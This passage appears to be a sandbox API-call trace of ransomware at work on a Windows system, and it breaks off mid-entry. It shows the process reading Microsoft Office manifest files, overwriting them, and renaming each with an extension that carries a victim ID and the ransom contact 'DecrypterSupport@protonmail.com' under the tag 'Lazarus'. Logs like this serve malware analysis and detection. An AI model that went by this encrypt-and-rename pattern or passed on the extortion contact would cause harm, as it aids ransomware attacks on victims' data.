[0099.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.287] GetFileType (hFile=0x360) returned 0x1 [0099.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0099.287] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0099.287] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0099.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0099.465] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0099.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0099.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0099.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3e8 [0099.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0099.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0099.565] GetLastError () returned 0x0 [0099.565] SetLastError (dwErrCode=0x0) [0099.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.566] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0099.566] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0099.566] WriteFile (in: hFile=0x360, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0099.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0099.566] CloseHandle (hObject=0x360) returned 1 [0099.567] AreFileApisANSI () returned 1 [0099.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85940 [0099.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.567] GetFileType (hFile=0x360) returned 0x1 [0099.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0099.567] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0099.567] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0099.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0099.569] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0099.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0099.570] GetLastError () returned 0x0 [0099.570] SetLastError (dwErrCode=0x0) [0099.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.570] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0099.570] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0099.571] WriteFile (in: hFile=0x360, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0099.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0099.571] CloseHandle (hObject=0x360) returned 1 [0099.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0099.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0099.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0099.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0099.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.571] AreFileApisANSI () returned 1 [0099.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0099.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x858a0 [0099.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 75 [0099.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0099.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x112) returned 0x91ee8 [0099.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x91ee8, cchWideChar=137 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 137 [0099.572] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0099.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91ee8 | out: hHeap=0x20000) returned 1 [0099.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0099.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.573] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2667, dwReserved0=0x5e4595d8, dwReserved1=0x89fd0321, cFileName="AppXManifestLoc.en-us.xml", cAlternateFileName="AP942B~1.XML")) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0099.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.574] AreFileApisANSI () returned 1 [0099.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml", lpUsedDefaultChar=0x0) returned 77 [0099.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.574] AreFileApisANSI () returned 1 [0099.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0099.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 77 [0099.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.575] GetFileType (hFile=0x360) returned 0x1 [0099.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.575] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.575] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.575] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.575] CloseHandle (hObject=0x360) returned 1 [0099.577] AreFileApisANSI () returned 1 [0099.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cce0 [0099.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8cce0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 77 [0099.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.577] GetFileType (hFile=0x360) returned 0x1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.577] CloseHandle (hObject=0x360) returned 1 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.578] AreFileApisANSI () returned 1 [0099.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0099.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 77 [0099.578] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2667)) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x175, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AuthoredExtensions.xml", cAlternateFileName="AUTHOR~1.XML")) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree 